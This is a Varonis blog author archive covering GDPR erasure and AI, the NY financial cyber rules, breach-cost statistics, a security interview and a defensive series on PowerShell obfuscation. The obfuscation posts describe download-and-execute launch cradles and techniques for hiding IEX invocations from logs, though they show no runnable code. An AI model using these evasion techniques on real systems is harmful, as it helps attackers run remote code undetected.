All posts by Andy Green

The Right to Be Forgotten and AI

The Right to Be Forgotten and AI

One (of the many) confusing aspects of the EU General Data Protection Regulation (GDPR) is its “right to be forgotten”. It’s related to the right to erasure but takes in far more ground. The right to have your personal deleted means that data held by the data controller must be removed on request by the consumer. The right to be forgotten refers more specifically to personal data the controller has made public on the Intertoobz.

Simple, right?

It ain’t ever that easy.

I came across a paper on this subject that takes a deeper look at the legal and technical issues around erasure and “forgetting”. We learn from the authors that deleting means something different when it comes to big data and artificial intelligence versus data held in a file system.

This paper contains great background on the recent history of the right to be forgotten, which is well worth your time.

Brief Summary of a Summary

Way back in 2010, a Mr. Costeja González brought a complaint against Google and a Spanish newspaper to Spain’s national Data Protection Authority (DPA). He noticed that when he entered his name into Google, the search results displayed a link to a newspaper article about a property sale made by Mr. González to resolve his personal debts.

The Spanish DPA dismissed the complaint against the newspaper —they had legal obligation to publish the property sale. However, the DPA allowed the one against Google to stand.

Google’s argument was that since it didn’t have a true presence in Spain – no physical servers in Spain held the data – and the data was processed outside the EU, it wasn’t under the EU Data Protection Directive (DPD).

Ultimately, the EU’s highest judicial body, the Court of Justice, in their right to be forgotten ruling in 2014 said that: search engine companies are controllers; the DPD applies to companies that market their services in the EU  (regardless of physical presence); and consumers have a right to request search engine companies to remove links that reference their personal information.

With the GDPR becoming EU law in May 2018 and replacing the DPD, the right to be forgotten is now enshrined in article 17 and the extraterritorial scope of the decision can be found in Article 3.

However, what’s interesting about this case is that the original information about Mr. Gonzalez was never deleted — it still can be found if you search the online version of the newspaper.

So the “forgetting” part means, in practical terms, that a key or link to the personal information has been erased, but not the data itself.

Hold this thought.

Artificial Intelligence Is Like a Mini-Google

The second half of this paper starts with a very good computer science 101 look at what happens when data is deleted in software. For non-technical people, this part will be eye opening.

Technical types know that when you’re done with a data object in an app and after the memory is erased or “freed”, the data does not in fact magically disappear. Instead, the memory chunk is put on a “linked list” that will eventually be processed and then made part of available software memory to be re-used again.

When you delete data, it’s actually put on a “take out the garbage” list.

This procedure is known as garbage collection, and it allows performance-sensitive software to delay the CPU-intensive data disposal to a later point when the app is not as busy.

Machine learning uses large data sets to train the software and derive decision making rules. The software is continually allocating and deleting data, often personal data, which at any given moment might be on a garbage collection queue waiting to be disposed.

What does it mean then to implement right to be forgotten in an AI or big data app?

The authors of the paper make the point that eliminating a single data point is not likely to affect the AI software’s rules. Fair enough. But certainly if tens or hundreds of thousands use their right to erase under the GPDR, then you’d expect some of these rules to shift.

They also note that data can be disguised through certain anonymity techniques or pseudonymization as a way to avoid storing identifiable data, thereby getting around the right to be forgotten. Some of these anonymity techniques  involve adding “noise” which may affect the accuracy of the rules.

This leads to an approach to implementing right to be forgotten for AI that we alluded to above: perhaps one way to forget is to make it impossible to access the original data!

A garbage collection process does this by putting the memory in a separate queue that makes it unavailable to the rest of the software—the software’s “handle” to the memory no longer grants access.  Google does the same thing by removing the website URL from its internal index.

In both cases, the data is still there but effectively unavailable.

The Memory Key

The underlying idea behind AI forgetting is that you remove or delete the key that allows access to the data.

This paper ends by suggesting that we’ll need to explore more practical (and economic) ways to handle right to be forgotten for big data apps.

Losing the key is one idea. There are additional methods that can be used: for example, to break up the personal data into smaller sets (or silo them) so that it is impossible or extremely difficult to re-identify each separate set.

Sure removing personal data from a file system is not necessarily easy, but it’s certainly solvable with the right products!

Agreed: AI forgetting involves additional complexity and solutions to the problem will differ from file deletion. It’s possible we’ll see some new erasure-like technologies in the AI area as well.

In the meantime, we’ll likely receive more guidance from EU regulators on what it means to forget for big data applications. We’ll keep you posted!

New York State Cyber Regulations Get Real

New York State Cyber Regulations Get Real

We wrote about NY’s innovate cyber regulations earlier this year. For those who don’t remember, NY State Department of Financial Services (NYSDFS) launched GDPR-like cyber security regulations for its massive financial industry, including requirements for 72-hour breach reporting, limited data retention, and designation of a chief information security officer.

As legal experts have noted, New York leads the rest of the states in its tough data security rules for banks, insurance, and investment companies. And after Equifax, it has proposed extending these rules to credit reporting agencies that operate in the state.

Transition Period Has Ended

The NYS rules are very process-oriented and similar to the GDPR in requiring documented security policies, response planning, and assessments – basically you have to be able to “show your work”.

However, there also specific technical requirements, unlike the GDPR, that have to be complied with as well: for example, pen testing, multi-factor authentication, and limiting access privileges.

Anyway, the cyber regulations went into effect on March 1, 2017, but most of the rules have a 180-day grace period. That period ended in late August.

There are exceptions.

They extended up to one year – March 1, 2018 — some of the more technical requirements: for example, performing pen testing and vulnerability assessments and conducting periodic risk assessments. And up to 18-months for implementing audit trails and application-level security.

So NY financial companies have a little extra time for the nittier rules.

However, that does mean that the 72-hour breach reporting rule is in effect!

Varonis Can Help

I’d like to add that the NYSDFS rules on breach reporting cover a far broader type of cyber event than any other state. Typically, state breach rules have language that requires notification for the exposure of certain types of PII data — see our totally awesome graphics to instantly visualize this.

While these NY rules protect similar types of PII as other states – social security and credit card numbers as well as online identifiers – financial companies in New York will also have to report on cyber events, as defined as follows:

Cybersecurity Event means any act or attempt, successful or unsuccessful, to gain unauthorized access to, disrupt or misuse an Information System or information stored on such Information System.

Note the language for any attempt to gain access or to disrupt or misuse system. This encompasses not only standard data exposures where personal data is stolen, but also denial-of-service (DoS), ransomware, and any kind of post-exploitation where the system tools are leveraged and misused.

Based on my reading and looking closely at the state’s FAQ, financial companies will have to notify NY regulators within 72-hours of data exposures involving PII and cybersecurity events “that have a reasonable likelihood  of materially harming” normal operations – see Section 500.17.

With data attacks now becoming the new normal, this tough notification rule — first in the US! — will likely require IT departments to put in significant technical effort to meet this tight timeline.

Varonis can help NY financial companies.

Ask to see a demo of our DatAlert product and get right with NYSDFS!


My Big Fat Data Breach Cost Post, Part II

My Big Fat Data Breach Cost Post, Part II

This article is part of the series "My Big Fat Data Breach Cost Series". Check out the rest:

If I had to summarize the first post in this series in one sentence, it’s this: as a single number, the average is not the best way to understand a dataset. Breach cost averages are no exception! And when that dataset is skewed or “heavy tailed”, the average is even less meaningful.

With this background, it’s easier to understand what’s going on with the breach cost controversy as its being played out in the business press. For example, this article in Fortune magazine, does a good job of explaining the difference between Ponemen’s breach costs per record stolen and Verizon’s statistic.

Regression Are Better

The author points out that Ponemon does two things that overstate their cost per record average. One, they include indirect costs in their model — potential lost business, brand damage, and other opportunity costs. While I’ll get to this in the next post, Ponemons’ qualitative survey technique is not necessarily bad, but their numbers have to be interpreted differently.

The second point is that Ponemon’s $201 per record average is not a good predictor, as is any raw average, and for skewed datasets sets it’s especially not a very useful number.

According to our friends at the Identity Theft Resource Center (ITRC), which tracks breach stats, we’re now reached over a 1000 breach incidents with over a 171 million records taken. Yikes!

Based on Ponemon’s calculations, American business has experienced $201 x 171 million or about $34 billion worth of data security damage. That doesn’t make any financial sense.

Verizon’s average of $.58 per record is based on reviewing actual insurance claim data provided by NetDiligence. This average is also deficient because it likely understates the problem — high deductibles and restrictive coverage policies play a role.

Verizon, by the way, has said this number is also way off! They were making a point about averages being unreliable (and taking a little dig at Ponemon).

The Fortune article then discusses Verizon’s log-linear regression, and reminds us that breach costs don’t grow at a linear rate. We agree on that point! The article also excerpts the table from Verizon that shows how different per record costs would apply for various ranges. I showed that same table in the previous post, and further below we’ll try to do something similar with incident costs.

In the last post, we covered the RAND model’s non-linear regression, which incorporate other factors besides record counts. Jay Jacobs also has a very simple model that’s better than a strict linear line. Verizon, RAND, and Jacobs’ regressions are all far better at predicting costs than just a single average number.

I’ll make one last point.

The number of data records involved in a breach can be hard to nail down. The data forensics often can’t accurately say what was taken: was it 10,000 records or a 100,000? The difference may amount to whether a single file was touched, and a factor of ten difference can change $201 per record to $20!

A more sensible approach is to look at the costs per incident. This average, as I wrote about last ime, is a little more consistent, and is roughly in the $6 million range based on several different datasets.

The Power of Power Laws

Let’s gets back to the core issue of averages. Unfortunately, data security stats are very skewed, and in fact the distributions are likely represented by power laws. The Microsoft paper, Sex, Lies and Cyber-Crime Surveys, makes this case, and also discusses major problems — under-sampling and misreporting — of datasets that are based on power laws: in short, a few data points have a disproportionate effect on the average.

Those who are math phobic and curl up into fetal position when they see an equation or hear the word “exponent” can skip to the next section without losing too much.

Let’s now look at the table from the RAND study, which I showed last time.

An incident of $750 million indicates that this is a spooky dataset. Boooo!

Note that the median cost per for an incident — see the bottom total — is $250,000 while the average cost of $7.84 million is an astonishing 30 times as great! And the maximum value for this dataset contains a monster-ish $750 million incident. We ain’t dealing with a garden variety bell-shaped or normal curve.

When the data is guided by power law curves, these leviathans exist, but they wouldn’t show up in data conforming to the friendlier and more familiar bell curve.

I’m now going to fit a power law curve to the above stats, or at least to the average — it’s a close enough fit for my purpose. The larger point is that you can have a fat-tailed dataset with the same average!

A brief word from our sponsor. Have I mentioned lately how great Wolfram Alpha is? I couldn’t have written this post without it. If I only had this app in high school. Back to the show.

The power law has a very simple form: it’s just the variable x, representing in this case the cost of an incident, taken to a negative exponent power of alpha:  x-α.

Simple. (Please don’t’ shout into your browser: I know there’s a normalizing constant, but I left it out to make things easier.)

I worked out an alpha of about -2.15 based on stats in the above table. The alpha, by the way, is the key to all the math that you have to do.

However, what I really want to know is the weight or percentage of the total costs for all breach incidents that each segment of the sample contributes. I’m looking for a representative average for each slice of the incident population.

For example, I know that the median or 50% of the sample — that’s about 460 incidents — has incident costs below $1.8 million. Can I calculate the average costs for this group? It’s certainly not $7.84 million!

There’s a little bit more math involved, and if you’re interested, you can learn about the Lorenz curve here. The graph below compares the unequal distribution of total incidents costs (the blue curve) for my dataset versus a truly equal distribution (the 45-degree red line).

The Lorenz curve: beloved by economists and data security wonks. The 1% rule! (Vertical axis represents percent of total incident costs.)

As you ponder this graph — and play with it here — you see that the blue curve doesn’t really change all that much up to around the 80% or .8 mark.

For example, the median at .5 and below represents 9% of the total breach costs. Based on the stats in the above table, the total breach cost for all incidents is about $7.2 billion ($7.84 million x 921). So the first 50% of my sample represents a mere $648 million ($7.2 billion x .09). If you do a little more arithmetic, you find the average is about $1.4 million per incident for this group.

The takeaway for this section is that most of the sample is not seeing an average incident cost close to $7.8 million! This also implies that at the tail there are monster data incidents pushing up the numbers.

The Amazing IOS Blog Data Incident Cost Table

I want to end this post with a simple table (below) that breaks average breach costs into three groups: let’s call it Economy, Economy Plus, and Business Class. This refers to the first 50% of the data incidents, the next 40%, and the last 10%. It’s similar to what Verizon did in their 2015 DBIR for per record costs.

Economy Economy Plus Business Class
Data incidents 460 368 92
Percent of Total Cost 9% 15% 74%
Total Costs $648 million $1 billion $5.33 billion
Average costs $1.4 million/incident $2.7 million/incident $58 million/incident

If you’ve made it this far, you deserve some kind of blog medal. Maybe we’ll give you a few decks of Cards Against IT if you can summarize this whole post in a single, concise paragraph and also explain my Lorenz curve.

In the next, and (I promise) last post in this series, I’ll try to tell a story based on the above table, and then offer further thoughts on the Verizon vs. Ponemon breach cost battle.

Story telling with just numbers can be dangerous. There are limits to “data-driven” journalism, and that’s where Ponemon’s qualitative approach has some significant advantages!

[Transcript] Ofer Shezaf and Keeping Ahead of the Hackers

[Transcript] Ofer Shezaf and Keeping Ahead of the Hackers

This article is part of the series "[Podcast] Varonis Director of Cyber Security Ofer Shezaf". Check out the rest:

Inside Out Security: Today I’m with Ofer Shezaf, who is Varonis’s Cyber Security Director. What does that title mean? Essentially, Ofer’s here to make sure that our products help customers get the best security possible for their systems. Ofer has had a long career in data security and I might add is a graduate of Israel’s amazing Technion University.

Welcome, Ofer.

Ofer Shezaf: Thank you.

IOS: So I’d like to start off by asking you how have attackers and their techniques changed since you started in cyber security?

OS: Well, it does give away the fact that I’ve been here for a while. And the question is also an age-old question, and people will say that it’s an ever-evolving threat and some would say just the same time and time again.

My own opinion is that it’s a mixed bag. Techies would usually say that it’s all the same as usual. Actually, the technical attack vectors tend to be rather the same. So buffer overflows have been with us for probably 40 years, and SQL Injection for the last 20.

Nevertheless, everything around the technical attack vectors does change. And I think that the sophistication and the resources that the dark side is investing — it always amazes me how much it’s always increasing!

When Stuxnet appeared a few years back, targeted, you know, nuclear reactors in Iran, I thought it was just, you know, a game changer. Things will never be the same!

But today it seems to be that every political campaign tends to utilize the same techniques, so it’s amazing how much the bad guys are investing into those hacks. And that changes things.


IOS: Do you have any thoughts on the dark web, and now this new trend of actually buying productized malware? Do you think that is changing things?

OS: It certainly does change things. To generalize a bit, I think that the economy behind hacking has evolved a lot. It’s way more of a business and the dark web today is not a dark alley anymore. It’s more like a business arena.

And if you think about it, ransomware, which is a business model to make money out of malware, is using the same technical techniques as malware always did. But today’s dark web, the economical infrastructure of Bitcoin enables it to be a real business, which is where it becomes riskier and more frightening to an extent.


IOS:  At Varonis, we have obviously been focusing on … that attackers have had no problem or less problems than in the past of getting inside. And that’s basically through phishing and some other techniques.

So do you think that IT departments have adapted to this new kind of threat environment where the attacker is better able to sort of get in, you know, in through the perimeter, or they have not adapted to these kinds of threats?

OS: So I must say I meet a lot of people working in IT security. And there are some smart guys out there. So they know what it’s about — we are not blind as an industry to the new risks. That said, the hackers are successful which implies that we are missing something! Based on results, we lose.

The question why this sort of misalignment of capabilities and results, is the million-dollar question. My answer is a personal one: we don’t invest enough … I mean, it’s a nine-to-five sort of job to be an IT security, and it tends to be a lot more like policing, like physical security. We need to be into it. I coined the term for that. We need … to do continuous security, as you think the army or military or police would do.


IOS: We spoke a little bit before this and you had talked about I guess Security Operation Centers or SOCs. So is that something you think that should be more a part of the security environment?

OS: Yeah. I mentioned continuous security but it’s just a term, and it might be worth sort of thinking about what it actually implies for an organization. So SOCs have been around for a while, Security Operation Centers. But they tend to, well, not take it all the way.

I think that we need to have people sitting there really 24-7 even in smaller organizations because it’s becoming, you know… You have a guard at the door even in smaller organizations. So you need someone in the SOC all the time.

And they don’t need just to react. They need to be proactive.

So they need to hunt, to look for the bad guys, to do rounds around the building if you think about it in physical terms. And if we will do that, if people will invest more time, more thinking …  they’ll also feedback into a technical means which are our primary security tool today.


IOS: Ofer, we often see a disconnect between the executive suite and people doing data security on the ground. Maybe that’s just appearing with all the breaches in the last few years. I’m not sure. If there are one or two things you could tell the C-level about corporate data security, what would they be?

OS: So I did mention one, which is how much we invest. I think there’s under-investment and investment, at the end of the day, is in the hands of the executives.

The other thing is rather contradictory maybe but it’s important and that’s the fact that there is no total security … The only system which is entirely secure is a system which has no users and doesn’t operate. So it’s all about risk management. If it’s about risk management, it implies that we have to make choices and it also implies that we will be hacked.

And if we will be hacked, we need to make sure it’s less informed systems and we also have to make sure that we have the right plans for the day after. What will we do when we are hacked?

So things like separating systems that are important, defining what are the business critical systems, those that your stock would drop if they are hacked and those that are peripheral, and important but less.


IOS: So we’ve often talked about Privacy by Design on the iOS blog, but the term as you told me is actually is older. It’s really… I mean, that phraseology…that phrase is old. It really comes out of Security by Design which is more of a programming term. And that really means that developers should consider security as they’re developing, as they’re actually making the app.

I was wondering if this approach of Security by Design where we’re actually doing the security from the start will really lessen the likelihood of breaches in the coming years. Or will we need more incentives to get these applications to be more secure?

OS: So we are moving from operational security, which is after systems are put in place and then it will be protected, into designing their security upfront before we start deploying them. So it’s … the other part. I spent many years in applications security, which is right around that.

And I think that the concept of baking in security into the development process makes sense to everyone. It saves on later on because you don’t have to fix things when they’re found, and it also has the benefit of making systems more secure.

That said, it’s not a new concept. I mentioned that Security by Design is term that’s used for a decade-and-a-half. It doesn’t happen enough and the question is why? Why is Security by Design not happening as much as we would like it to be and how to make it better?

And I think that the key to that is that developers are not measured by security! They are measured by how much they output in terms of functionality. Quality is important but it’s measured in terms of failures rather than security breaches. And security is someone else’s problem so it’s not the developer problem or the developing manager problem.

As long as we don’t change that, as long as they don’t think of security as an important goal of the development process, it would be a leftover, something done that is an afterthought.


IOS: Well, it sounds like we may need other incentives here. And so for example, I can go to a store and buy a light bulb, and I know it has been certified by some outside agency. In the United States, it’s Underwriters Lab. There are a few others that do that.

Do you think we may see something like that, an outside certification saying that this software meets some minimal security requirements?

OS: So it goes back to compliance versus real security … I think compliance and regulations are important for market deficiencies. So when things do not work because they aren’t the right incentives, so it’s an important starting point.

That said, they are there, they’re just not providing enough. They’re also not, today, targeted specifically at the development phase, and in most cases, they are taken to be part of the operational phase, which is later on.

So it will be an interesting idea to try to create a development process for specific regulations. It’s harder because we make end-result regulations … we don’t make good software requirements!

That said, I’ve once seen an interesting demonstration. Somebody created a label for software, which is like the label you have on food, with the ingredients saying how much, you know, how much SQL injections it might have and how much cross-site scripting it might have, as you would have for sugars and fats …


IOS: It is quite an interesting idea! At the blog, we’ve written a lot about pen testing, and actually, we’ve also spoken to a few actual testers. You know, obviously, this is another way to deal with … improving security in an organization. I’m wondering, how do you feel about hiring these outside pen testers?

OS: So first of all, by definition, it’s the opposite of Security by Design. It usually comes in later in the game once the system is ready. So if I said I believe in security by design then pen testing seems to be less important. That said, because Security by Design doesn’t work well, pen testing is needed. It’s very much an educational phase where you bring people in, and they tell you that you didn’t do right.

Why I don’t see this as more than educational?  First, because pen testers usually are given just as much time as was allocated. You know, it’s money at the end of the day, and today the bad guys are just investing more.

It’s not a holistic way to make the software secure, it’s an … opportunistic one, and usually it gets some things, but it doesn’t get all the things … It’s good for education — would show there is an issue  — but it’s not good enough to make sure that we are really secure.

IOS: That’s right

OS: That said, it is important … Two things which are important when you do pen testing. The first one is since pen testers find just some of the issues, make sure that those are used to create a thought process around the larger challenges of the software!

So if they found a cross-site scripting in a specific place, don’t just fix this one, fix all of the cross-site scriptings … or think why your system was not built to overcome cross-site scripting in the first place. Take it [as a]  driver for security by design.

As an anecdote, I once met an organization where a pen tester came in, he found cross-site scripting. He demonstrated it by having the app popping up a “gotcha” dialogue. And two weeks later, the developers came back and said they fixed it. It doesn’t happen anymore, and what they did was just to check for the word “gotcha” in their input and block it, which is…it does happen, unfortunately!

And beyond fixing this …,it would be well if you have pen testing and they found cross-site scripting, fine, think of why your system, in the first place, was not built to handle those across the board.

The second thing that’s very important is pen testing is usually done very late in the development lifecycle. And too many times, there’s just not enough time to fix things. So making it earlier, making part of the, you know, test as models are released rather than last moment, will ensure that more can be fixed before launch … those systems are less vulnerable.


IOS: We also know that Microsoft has started addressing some long-standing security gaps … starting with Windows 10. There’s also a Windows 10 S, which is a Microsoft’s special security configuration for 10. I was wondering if you can tell us what 10 S is doing that may help organizations with their security.

OS: So Microsoft 10 S is the whitelisting version. If you think about security, there are two options to secure things and nearly every security system selects one. One of them is to allow everything in general and then try to block what’s dangerous, okay? An anti-virus would be a good example. Install whatever you want to install and then the anti-virus will catch it if it’s a virus.

The second option, whitelisting is always more secure, but always limits functionality more. Windows 10 S takes this approach. It limits installing software, only things that actually come from the Microsoft App Store.

So it’s way more limited, functionality speaking, sort of feels as it is less of a full system. And personally, you know, [as] an IT guy being here for quite a while, it feels too limited for me. But looking at how — you know, my kids are using computers — how, you know, general office workers are using computers, it might be just enough.

So it might be a good choice by Microsoft to create those limited versions that are secure by design because they allow just as much rather than blocking what’s wrong.

IOS: Right. If I understand what you’re saying, it would prevent, let’s say, malware from being loaded because the malware wouldn’t have been signed, so it wouldn’t have been loaded on the actual whitelist of …

OS: It’s not just signed, it’s actually downloaded from Microsoft App Store, so it’s way more … Signing exists to Windows today as it’s the next step.

IOS: So then it would really prevent anything from being…any outside software from being loaded. Okay. And … is there a performance penalty for that?

OS: As far as I know there is no performance penalty. In a way, the same… having more security in this case might actually improve security and stability because unpredicted software is also a challenge for performance and stability. The downside is functionality.


IOS: Right. We know from security analysts, hackers and the cybercriminals have targeted executives, they call it, you know, spear phishing or whale phishing and, you know, they have the more valuable information compared to the average employee.

So it will sort of make sense to actually target these people. I was wondering if you think that executives should receive extra security protections or they should take extra precautions in their dealings with, you know, just in their day-to-day work on the computer?

OS: So in a way, you said it all, because we do know that executives are targeted more, so we need to focus on securing them. We do it in the real world … drawing parallels with the physical security world, so it does make sense.  … A lot of our security controls are automated, and when it’s automated, if you invest in detecting that somebody is posing as the user, why stop at executives?

So my take on that would be, make the automated detection systems address any user, but then focus. It still gets to incident response team that has to assess whether it’s the risk is there and what to do. They can prioritize based on the type of the user– executives being one type of sensitive user, by the way. Of course, admins are another type.

IOS: Yeah, I mean, I could almost imagine a, I guess, like a SOC having a special section just focused on executives and perhaps looking at … any kind of notifications or alerts that come up from the, you know, the standard configuration. But actually, digging a little deeper when those things come up with the executives.

OS: Yes, if you think about it, the major challenge of a SOC is handling the flow of alerts. And any means that will enable them to be more efficient in ending alerts, focusing on those that are more critical to the business where the risk is higher, is important. Executives are a very good example.

So just pop up the alerts about the executives to the top of the list, and the analyst gets to them first and he’s doing something reasonable…He is more valuable to the organization.

In fact, so there is no 100% security! Some incidents or alerts would be left.


IOS: One last question. Any predictions on hacking trends in the next few years? I mean, are there new techniques on the horizon that we should be paying closer attention to?

OS: Oh, it’s a crystal ball question. It’s always hard. I’m probably wrong, but I’ll say I’ll try.

So the way to look into that, the way to try to predict is that I found out that hacking techniques usually trail changes in the IT technology. Hackers become experts in the new technology only a year or two or even more than that after the technology becomes widespread. In this respect, I think that mobile is the next front.

We all use mobile, but actually, business uses  mobile  … which is  rather new, Salesforce Mobile App. In the last of couple years, we can actually do more work on the mobile device, which means it’s a good target for malware. And I think we’ve seen malware for any mobile, but we still didn’t see financial or enterprise malware as ransom or for mobile, for example, and that will be coming.

IOS: And what about Internet of Things — it is kind of somewhat related to mobile — as a new trend? Are we starting to see some of that?

OS: Yes, it’s an area where we’ve seen two things. First of all, a lot of research, which always comes before actual real-world use. If you look at what researchers are doing today, you know what hackers will do in two or three years!

And after today, we’ve seen mostly a denial-of-service attacks against, you know, Internet of Things devices where they were … taken off the network.

It would be interesting — it would be frightening actually — once the bad guys start to do more innovative damage by taking over devices. You know, cars are a very frightening example, of course, traffic lights, electricity controllers, etc.

That said, the business model is the driving factor. And I still don’t see — unlike, for example, malware for mobile or a malware over on cloud systems — the business model, apart from nation states, around the Internet of Things.

IOS: It’s interesting! So, Ofer, thank you for joining us. This was a really fascinating discussion, and it’s good to get this perspective from someone who’s been in the business for such a long time.

OS: Thank you. My pleasure as well.

Catching Up With Varonis Tech Evangelist Brian Vecci

Catching Up With Varonis Tech Evangelist Brian Vecci

Who was that incredibly knowledgeable security pro on CNBC talking about the Equifax breach? That familiar face and voice  belongs to none other than our own Brian Vecci. If you’ve been following Varonis on Twitter or Linkedin, you’re likely aware that Brian has been on CNBC before.

And he’s made a lot of other media appearance. So we asked our amazing research staff to track down Brian’s recent interview activity — not surprisingly, he’s been busy! We’ve embedded a few of his interviews below. So sit back and enjoy Mr. V’s high-bandwidth conversations.

CNBC: Equifax Breach

CNBC: Consumer Security Advice

Nightly Business Report (NBR): WannaCry Ransomware

Security Guy TV (Black Hat 2017): Insider Security

Cybersecurity Journal (Black Hat): Data Is a Business Asset

PowerShell Obfuscation: Stealth Through Confusion, Part II

PowerShell Obfuscation: Stealth Through Confusion, Part II

This article is part of the series "PowerShell Obfuscation". Check out the rest:

Let’s step back a little from the last post’s exercise in jumbling PowerShell commands. Obfuscating code as a technique to avoid detection by malware and virus scanners (or prevent reverse engineering) is nothing really new. If we go back into the historical records, there’s this (written in Perl).  What’s the big deal, then?

The key change is that hackers can go malware-free by using garden variety PowerShell in practically all phases of an attack. And through obfuscation, this PowerShell-ware then effectively has an invisibility cloak.  And we all know that cloaking devices can give one side a major advantage!

IT security groups have to deal with this new threat.

Windows PowerShell Logging Is Pretty Good!

As it turns out, I was little too quick in my review last time of PowerShell’s logging capabilities, which are enabled in Group Policy Management. I showed an example where I downloaded and executed a PowerShell cmdlet from a remote website:

I was under the impression that PowerShell logging would not show the evil malware embedded in the string that’s downloaded from the web site.

I was mistaken.

If you turn on the PowerShell module logging through GPM, then indeed the remote PowerShell code appears in the log. To refresh memories, I was using PowerShell version 4 and (I believe) the latest Windows Management Framework (WMF), which is supposed to support the more granular logging.

Better PowerShell logging can be enabled in GPM!

It’s a minor point, but it just means that the attackers would obfuscate the initial payload as well.

I was also mistaken in thinking that the obfuscations provided by Invoke-Obfuscation would not appear de-obfuscated in the log. For example, in the last post I tried one of the string obfuscations to produce this:

Essentially, it’s just a concatenation of separate strings that’s assembled together at run-time to form a cmdlet.

For this post, I sampled more of Invoke-Obfuscation’s scrambling options to see how the commandline appears in the Event log.

I tried its string re-order option (below), which takes advantage of some neat tricks in PowerShell.

Notice that first part $env:comspec[4,15,25]? It takes the environment variable $env:comspec and pulls out the 4-, 15-, and 25-th characters to generate “IEX”, the PowerShell alias for Invoke-Expression. The joinoperator takes the array and converts it to a string.

The next part of this PowerShell expression uses the format operator f. If you’ve worked with sprintf-like commands as a programmer, you’ll immediately recognize these capabilities. However, with PowerShell, you can specify the element position in the parameter list that gets pulled in to create the resulting string. So {20}, {5}, {9}, {2} starts assembling yet another Invoke_Expression cmdlet.

Yes, this gets complicated very quickly!

I also let Invoke-Obfuscation select a la carte from its obfuscation menu, and it came up with the following mess:

After trying all these, I checked the Event Viewer to see that with the more powerful logging capabilities now enabled, Windows could  see through the fog, and capture the underlying PowerShell:

Heavily obfuscated, but with PowerShell Module logging enabled the underlying cmdlets are available in the log.

Does this mean that PowerShell obfuscation always gets de-obfuscated in the Window Event log, thereby allowing malware detectors to use traditional pattern matching?

The answer is no!

Invoke-Obfuscation also lets you encode PowerShell scripts into raw ASCII, Hex, and, yes, even Binary. And this encoding obfuscation seems to foil the event logging:

The underlying cmdlet represented by this Hex obfuscation was not detected.

Quantifying Confusion

It appears at this point the attackers have the advantage: a cloaking device that lets their scripts appear invisible to defenders or at least makes them very fuzzy.

The talk given at Black Hat that I referenced in the first post also introduced work done by Microsoft’s Lee Holmes – yeah, that guy —  in detecting obfuscated malware using probabilistic models and machine learning techniques.

If you’re interested you can look at the paper they presented at the conference. Holmes borrowed techniques from natural language processing to analyze character frequency of obfuscated PowerShell scripts versus the benign varieties. There are differences!

Those dribbles below the main trend show that obfuscated PowerShell has a different character frequency than standard scripts.

In any case, Holmes moved to a more complicate logistical regression model – basically classifying PowerShell code into either evil obfuscated or normal scripts. He then trained his logit by looking deep into PowerShell’s parsing of commands – gathering stats for levels of nesting, etc. – to come up with a respectable classifier with an accuracy of about 96%. Not by any means perfect, but a good start!

A Few More Thoughts

While I give a hat tip to Microsoft for improving their PowerShell logging game, there are still enough holes for attackers to get their scripts run without being detected. And this assumes that IT groups know to enable PowerShell Module logging in the first place!

Lee Holmes machine learning model suggests that it’s possible to  detect these stealthy scripts in the wild.

However, this means we’re back into the business of scanning for malware, and we know that this approach ultimately falls short. You can’t keep up with the attackers who are always changing and adjusting their code to fool the detectors.

Where is this leading? Of course, you turn on PowerShell logging as needed and try to keep your scanning software up to date, but in the end you need to have a solid secondary defense, one based on looking for post-exploitation activities involving file accesses of your sensitive data.

Catch what PowerShell log scanners miss! Request a demo today.

[Podcast] Varonis Director of Cyber Security Ofer Shezaf, Part II

[Podcast] Varonis Director of Cyber Security Ofer Shezaf, Part II

This article is part of the series "[Podcast] Varonis Director of Cyber Security Ofer Shezaf". Check out the rest:

Leave a review for our podcast & we'll send you a pack of infosec cards.

A self-described all-around security guy, Ofer is in charge of security standards for Varonis products. In this second part of the interview, we explore different ways to improve corporate data security, including security by design techniques at the development stage, deploying Windows 10s, and even labeling security products!

Learn more from Ofer by clicking on the interview above.

Continue reading the next post in "[Podcast] Varonis Director of Cyber Security Ofer Shezaf"

PowerShell Obfuscation: Stealth Through Confusion, Part I

PowerShell Obfuscation: Stealth Through Confusion, Part I

This article is part of the series "PowerShell Obfuscation". Check out the rest:

To get into the spirit of this post, you should probably skim through the first few slides of this presentation by Daniel Bohannon and Le Holmes given at Black Hat 2017. Who would have thunk that making PowerShell commands look unreadable would require a triple-digit slide deck?

We know PowerShell is the go to-tool for post-exploitation, allowing attackers to live off the land and prosper. Check out our pen testing Active Directory series for more proof.

However, IT security is, in theory monitoring user activities at, say,  the Security Op. Center or SoC, so it should be easy to spot when a “non-normal” command is being executed.

In fact, we know that one tipoff of a PowerShell attack is when a user creates a  WebClient object,  calls its Downloadstring method, and then executes the string contained in the remote web page. Something like the following:

Why would an ordinary user or even for that matter an admin do this?

While this “clear text” is easy to detect by looking at the right logs in Windows and scanning for the appropriate keywords, the obfuscated version is anything but. At the end of this post, we’ll show how this basic “launch cradle” used by hackers can be made to look a complete undecipherable word jumble.

PowerShell Logging    

Before we take our initial dive into obfuscation, let’s explore how events actually gets logged by Windows, specifically for PowerShell. Once you see the logs, you’ll get a greater appreciation of what hackers are trying to hide.

To their credit, Microsoft has realized the threat possibilities in PowerShell and started improving command logging in Windows 7. You see these improvements in PowerShell versions 4 and 5.

In my own AWS environment, the Windows Server 2012 I used came equipped with version 4. It seems to have most of the advanced logging capabilities — though 5 has the latest and greatest.

From what I was able to grok reading Bohannon’s great presentation and a few other Microsoft sources, you need to enable event 4688 (process creation) and then  turn on auditing for the  PowerShell command line. You can read more about it in this Microsoft document.

And then for even more voluminous logging,  you can set policies in the GPO console to enable, for example, full transcription logging of a PowerShell (below).

More PowerShell logging features in the Administrate Template under Computer Configuration.

No, I didn’t do that for my own testing! I discovered (as many other security pros have) that when using the Windows Event Viewer  things get confusing very quickly. I don’t need the full power of transcription logging.

For kicks I ran a simple pipeline — Get-Process | %{Write-Host $_.Handles}— to print out process handles, and generated … an astonishing 114 events in the PowerShell log. Ofer, by the way, has a good post explaining the larger problem of correlating separate events to understand the full picture.

Got it! The original pipeline that spewed off lots of related events.

The good news is that from the Event Viewer,  I was able to see the base command line that triggered the event cascade (above).

Release the Confusion

The goal of the attacker is to make it very difficult or impossible for security staff viewing the log to detect obvious hacking activity or, more likely, fool analytics software to not trigger when malware is loaded.

In the aforementioned presentation, there’s a long, involved example, showing how to obfuscate malware by exploiting PowerShell’s ability to execute commands embedded in a string.

Did you know this was possible?

Or, at a more evil level, this:

Or take a look at this, which I cooked up based on my own recipe:

